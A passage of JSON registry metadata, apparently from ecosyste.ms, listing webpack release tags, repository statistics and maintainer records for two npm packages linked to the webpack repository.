b/repositories/webpack%2Fwebpack/tags/v1.0.0-beta8/manifests"},{"name":"v1.0.0-beta7","sha":"8be2e5a14ac873b703119362b5c3447eb8e5f60e","kind":"commit","published_at":"2014-01-21T15:25:02.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-beta7","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-beta7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-beta7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta7/manifests"},{"name":"v1.0.0-beta6","sha":"a9fc61ff1a22091135f183809fb537a1325e532b","kind":"commit","published_at":"2014-01-10T09:49:30.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-beta6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-beta6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-beta6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta6/manifests"},{"name":"v1.0.0-beta5","sha":"cf45c9cd1cce6e3136894ace4f9ae8618d1211a1","kind":"commit","published_at":"2014-01-08T18:23:55.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-beta5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-beta5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-beta5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta5/manifests"},{"name":"v1.0.0-beta4","sha":"df0f3687db404a87eab75af62504828ce13dd03d","kind":"commit","published_at":"2013-12-29T11:21:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-beta4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-beta4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-beta4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta4/manifests"},{"name":"v1.0.0-beta3","sha":"a4c58898ff5395124ac8e2cf79c25095fbe8a98e","kind":"commit","published_at":"2013-12-29T11:11:26.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-beta3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-beta3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-beta3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta3/manifests"},{"name":"v1.0.0-beta2","sha":"f30bcfbd5793f9282d7dedb0ea0a20674f763fed","kind":"commit","published_at":"2013-12-19T22:23:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-beta2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-beta2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-beta2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta2/manifests"}]},"repo_metadata_updated_at":"2026-08-29T04:49:19.928Z","dependent_packages_count":1,"downloads":31,"downloads_period":"last-month","dependent_repos_count":1,"rankings":{"downloads":54.90282062971637,"dependent_repos_count":10.295976646711454,"dependent_packages_count":20.907756255897063,"stargazers_count":0.07800884455036095,"forks_count":0.39276155743318475,"docker_downloads_count":null,"average":17.31546478686169},"purl":"pkg:npm/%40kovensky/webpack","advisories":[],"docker_usage_url":"https://docker.ecosyste.ms/usage/npm/@kovensky/webpack","docker_dependents_count":null,"docker_downloads_count":null,"usage_url":"https://repos.ecosyste.ms/usage/npm/@kovensky/webpack","dependent_repositories_url":"https://repos.ecosyste.ms/api/v1/usage/npm/@kovensky/webpack/dependencies","status":null,"funding_links":["https://opencollective.com/webpack"],"critical":null,"issue_metadata":{"last_synced_at":"2026-08-29T00:23:50.084Z","issues_count":10165,"pull_requests_count":9442,"avg_time_to_close_issue":10849647.758436048,"avg_time_to_close_pull_request":2769754.713370066,"issues_closed_count":9898,"pull_requests_closed_count":8893,"pull_request_authors_count":1445,"issue_authors_count":6686,"avg_comments_per_issue":5.834825381210035,"avg_comments_per_pull_request":3.180152510061428,"merged_pull_requests_count":6029,"bot_issues_count":8,"bot_pull_requests_count":2914,"past_year_issues_count":80,"past_year_pull_requests_count":937,"past_year_avg_time_to_close_issue":868643.701754386,"past_year_avg_time_to_close_pull_request":363604.70405405405,"past_year_issues_closed_count":57,"past_year_pull_requests_closed_count":740,"past_year_pull_request_authors_count":79,"past_year_issue_authors_count":62,"past_year_avg_comments_per_issue":3.45,"past_year_avg_comments_per_pull_request":4.890074706510139,"past_year_bot_issues_count":1,"past_year_bot_pull_requests_count":140,"past_year_merged_pull_requests_count":586,"issues_url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/issues","maintainers":[{"login":"sokra","count":1358,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/sokra"},{"login":"alexander-akait","count":1083,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/alexander-akait"},{"login":"vankop","count":196,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/vankop"},{"login":"TheLarkInn","count":177,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/TheLarkInn"},{"login":"ooflorent","count":177,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ooflorent"},{"login":"hai-x","count":128,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/hai-x"},{"login":"xiaoxiaojx","count":112,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/xiaoxiaojx"},{"login":"timse","count":100,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/timse"},{"login":"snitin315","count":98,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/snitin315"},{"login":"jhnns","count":78,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/jhnns"},{"login":"xtuc","count":54,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/xtuc"},{"login":"smelukov","count":52,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/smelukov"},{"login":"bjohansebas","count":43,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/bjohansebas"},{"login":"evenstensberg","count":37,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/evenstensberg"},{"login":"chenxsan","count":36,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/chenxsan"},{"login":"Legends","count":35,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Legends"},{"login":"Jessidhia","count":34,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Jessidhia"},{"login":"avivkeller","count":33,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/avivkeller"},{"login":"ScriptedAlchemy","count":29,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ScriptedAlchemy"},{"login":"jamesgeorge007","count":26,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/jamesgeorge007"},{"login":"michael-ciniawsky","count":23,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/michael-ciniawsky"},{"login":"EugeneHlushko","count":23,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/EugeneHlushko"},{"login":"Connormiha","count":20,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Connormiha"},{"login":"hiroppy","count":19,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/hiroppy"},{"login":"samccone","count":15,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/samccone"},{"login":"SpaceK33z","count":15,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/SpaceK33z"},{"login":"sendilkumarn","count":14,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/sendilkumarn"},{"login":"mc-zone","count":14,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/mc-zone"},{"login":"gajus","count":13,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/gajus"},{"login":"ljqx","count":11,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ljqx"},{"login":"byzyk","count":11,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/byzyk"},{"login":"gpoitch","count":10,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/gpoitch"},{"login":"kentcdodds","count":9,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/kentcdodds"},{"login":"nveenjain","count":9,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/nveenjain"},{"login":"jbottigliero","count":8,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/jbottigliero"},{"login":"JounQin","count":7,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/JounQin"},{"login":"edmorley","count":7,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/edmorley"},{"login":"pierreneter","count":7,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/pierreneter"},{"login":"elliottsj","count":7,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/elliottsj"},{"login":"montogeek","count":7,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/montogeek"},{"login":"burhanuday","count":7,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/burhanuday"},{"login":"Janpot","count":6,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Janpot"},{"login":"shama","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/shama"},{"login":"ovflowd","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ovflowd"},{"login":"billyjanitsch","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/billyjanitsch"},{"login":"keblodev","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/keblodev"},{"login":"matheus1lva","count":4,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/matheus1lva"},{"login":"ljcrapo","count":4,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ljcrapo"},{"login":"rishabh3112","count":4,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/rishabh3112"},{"login":"anikethsaha","count":4,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/anikethsaha"},{"login":"joshwiens","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/joshwiens"},{"login":"jeremenichelli","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/jeremenichelli"},{"login":"reergymerej","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/reergymerej"},{"login":"UlisesGascon","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/UlisesGascon"},{"login":"MrKou47","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/MrKou47"},{"login":"aboktor","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/aboktor"},{"login":"mikegreiling","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/mikegreiling"},{"login":"mattlewis92","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/mattlewis92"},{"login":"eemeli","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/eemeli"},{"login":"pranshuchittora","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/pranshuchittora"},{"login":"3ru","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/3ru"},{"login":"ryanclark","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ryanclark"},{"login":"sapegin","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/sapegin"},{"login":"loveky","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/loveky"},{"login":"edocipriano","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/edocipriano"},{"login":"PatrickJS","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/PatrickJS"},{"login":"jevancc","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/jevancc"},{"login":"chrisdothtml","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/chrisdothtml"},{"login":"anshumanv","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/anshumanv"},{"login":"leandrohstein","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/leandrohstein"}],"active_maintainers":[{"login":"alexander-akait","count":438,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/alexander-akait"},{"login":"hai-x","count":85,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/hai-x"},{"login":"xiaoxiaojx","count":54,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/xiaoxiaojx"},{"login":"bjohansebas","count":43,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/bjohansebas"},{"login":"avivkeller","count":33,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/avivkeller"},{"login":"evenstensberg","count":6,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/evenstensberg"},{"login":"UlisesGascon","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/UlisesGascon"},{"login":"ovflowd","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ovflowd"}]},"versions_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/@kovensky%2Fwebpack/versions","version_numbers_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/@kovensky%2Fwebpack/version_numbers","latest_version_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/@kovensky%2Fwebpack/latest_version","dependent_packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/@kovensky%2Fwebpack/dependent_packages","related_packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/@kovensky%2Fwebpack/related_packages","codemeta_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/@kovensky%2Fwebpack/codemeta","maintainers":[{"uuid":"kovensky","login":"kovensky","name":null,"email":"diogomfranco@gmail.com","url":null,"packages_count":5,"html_url":"https://www.npmjs.com/~kovensky","role":null,"created_at":"2022-11-20T18:30:14.234Z","updated_at":"2022-11-20T18:30:14.234Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/maintainers/kovensky/packages"}],"registry":{"name":"npmjs.org","url":"https://registry.npmjs.org","ecosystem":"npm","default":true,"packages_count":5816876,"maintainers_count":1245095,"namespaces_count":426640,"keywords_count":889778,"github":"npm","metadata":{"funded_packages_count":192526,"rate_limit":2},"icon_url":"https://github.com/npm.png","created_at":"2022-04-04T15:19:23.081Z","updated_at":"2026-09-02T05:02:10.244Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages","maintainers_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/maintainers","namespaces_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/namespaces"}},{"id":5251640,"name":"wip-overall-departed-scorebook-paralyze-genre","ecosystem":"npm","description":"Unstable version","homepage":"https://github.com/webpack/webpack","licenses":"MIT","normalized_licenses":["MIT"],"repository_url":"https://github.com/webpack/webpack","keywords_array":[],"namespace":null,"versions_count":1,"first_release_published_at":"2022-09-15T13:35:25.084Z","latest_release_published_at":"2022-09-15T13:35:25.084Z","latest_release_number":"5.74.0","last_synced_at":"2026-09-03T00:31:44.298Z","created_at":"2022-09-17T00:28:10.966Z","updated_at":"2026-09-03T00:31:44.298Z","registry_url":"https://www.npmjs.com/package/wip-overall-departed-scorebook-paralyze-genre","install_command":"npm install wip-overall-departed-scorebook-paralyze-genre","documentation_url":null,"metadata":{"funding":{"type":"opencollective","url":"https://opencollective.com/webpack"},"dist-tags":{"latest":"5.74.0"},"contentPolicy":null},"repo_metadata":{"id":2686067,"uuid":"3678731","full_name":"webpack/webpack","owner":"webpack","description":"A bundler for javascript and friends. Packs many modules into a few bundled assets. Code Splitting allows for loading parts of the application on demand. Through \"loaders\", modules can be CommonJs, AMD, ES6 modules, CSS, Images, JSON, Coffeescript, LESS, ... and your custom stuff.","archived":false,"fork":false,"pushed_at":"2024-04-13T10:40:16.000Z","size":63485,"stargazers_count":64137,"open_issues_count":260,"forks_count":8711,"subscribers_count":1483,"default_branch":"main","last_synced_at":"2024-04-14T10:02:49.441Z","etag":null,"topics":["amd","build-tool","commonjs","compiler","es2015","es6","esm","javascript","javascript-compiler","javascript-modules","loaders","module-bundler","plugins","web","web-performance","webpack"],"latest_commit_sha":null,"homepage":"https://webpack.js.org","language":"JavaScript","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"mit","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/webpack.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":"CONTRIBUTING.md","funding":".github/FUNDING.yml","license":"LICENSE","code_of_conduct":"CODE_OF_CONDUCT.md","threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":"SECURITY.md","support":null,"governance":null,"roadmap":null,"authors":null,"dei":null},"funding":{"open_collective":"webpack"}},"created_at":"2012-03-10T10:08:14.000Z","updated_at":"2024-07-11T19:20:16.408Z","dependencies_parsed_at":"2023-09-29T07:05:57.262Z","dependency_job_id":"7b0feb4e-5057-4c49-8406-285c63457b92","html_url":"https://github.com/webpack/webpack","commit_stats":{"total_commits":11988,"total_committers":916,"mean_commits":"13.087336244541484","dds":0.54004004004004,"last_synced_commit":"e97af9b5317bc0e7fdbc035b98a577edfe258b83"},"previous_names":[],"tags_count":622,"template":false,"template_full_name":null,"repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/webpack","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/refs/heads/main","host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":215829931,"owners_count":15936612,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2022-07-04T15:15:14.044Z","host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"},"owner_record":{"login":"webpack","name":"webpack","uuid":"2105791","kind":"organization","description":"","email":null,"website":"https://webpack.js.org","location":null,"twitter":null,"company":null,"icon_url":"https://avatars.githubusercontent.com/u/2105791?v=4","repositories_count":49,"last_synced_at":"2024-04-15T10:09:16.343Z","metadata":{"has_sponsors_listing":false},"html_url":"https://github.com/webpack","funding_links":[],"total_stars":94338,"followers":774,"following":0,"created_at":"2022-11-02T16:19:08.894Z","updated_at":"2024-04-15T10:09:17.360Z","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/webpack","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/webpack/repositories"},"tags":[{"name":"v5.93.0","sha":"277460b33bcc49c51acbbcd688672aa4ec685732","kind":"commit","published_at":"2024-07-11T18:28:51.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.93.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.93.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.93.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.93.0/manifests"},{"name":"v5.92.1","sha":"a82e0cd00e26d8452295f0d680417e4656a6d7cc","kind":"commit","published_at":"2024-06-19T16:19:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.92.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.92.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.92.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.92.1/manifests"},{"name":"v5.92.0","sha":"34e2561addb0f65a7a6fb0ce7ae1aea4cd1d599f","kind":"commit","published_at":"2024-06-11T14:50:48.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.92.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.92.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.92.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.92.0/manifests"},{"name":"v5.91.0","sha":"60daca54105f89eee45e118fd0bbc820730724ee","kind":"commit","published_at":"2024-03-20T16:11:48.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.91.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.91.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.91.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.91.0/manifests"},{"name":"v5.90.3","sha":"651b3d66d10d54da31d4cb7123ea74d10f1f5456","kind":"commit","published_at":"2024-02-19T12:32:11.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.90.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.90.3","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.90.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.90.3/manifests"},{"name":"v5.90.2","sha":"11c1be3d0838e8de31900aacabcd449e9da77eaf","kind":"commit","published_at":"2024-02-15T14:24:34.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.90.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.90.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.90.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.90.2/manifests"},{"name":"v5.90.1","sha":"08770761c8c7aa1e6e18b77d3deee8cc9871bd87","kind":"commit","published_at":"2024-02-01T17:09:26.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.90.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.90.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.90.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.90.1/manifests"},{"name":"v5.90.0","sha":"4a2662381ed8e6a9d849b494511459f5858d4e82","kind":"commit","published_at":"2024-01-24T13:09:25.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.90.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.90.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.90.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.90.0/manifests"},{"name":"v5.89.0","sha":"87660921808566ef3b8796f8df61bd79fc026108","kind":"tag","published_at":"2023-10-13T22:27:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.89.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.89.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.89.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.89.0/manifests"},{"name":"v4.47.0","sha":"dfffd6a241bf1d593b3fd31b4b279f96f4a4aab1","kind":"tag","published_at":"2023-09-06T17:15:50.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.47.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.47.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.47.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.47.0/manifests"},{"name":"v5.88.2","sha":"1f99ad6367f2b8a6ef17cce0e058f7a67fb7db18","kind":"tag","published_at":"2023-07-12T18:15:36.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.88.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.88.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.88.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.88.2/manifests"},{"name":"v5.88.1","sha":"6be4065ade1e252c1d8dcba4af0f43e32af1bdc1","kind":"tag","published_at":"2023-06-28T16:34:37.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.88.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.88.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.88.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.88.1/manifests"},{"name":"v5.88.0","sha":"1e18b1d1c74e26a84e9adee519c045e2d8ed40a4","kind":"tag","published_at":"2023-06-21T18:09:04.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.88.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.88.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.88.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.88.0/manifests"},{"name":"v5.87.0","sha":"8e0e0eb47d47fe33e4c9ef9bc455d9584f7ea92c","kind":"tag","published_at":"2023-06-14T18:24:58.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.87.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.87.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.87.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.87.0/manifests"},{"name":"v5.86.0","sha":"2dc8755dc40e24e3ba5760e96738b74990116711","kind":"tag","published_at":"2023-06-07T15:13:34.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.86.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.86.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.86.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.86.0/manifests"},{"name":"v5.85.1","sha":"f0f0dd548871566c77c69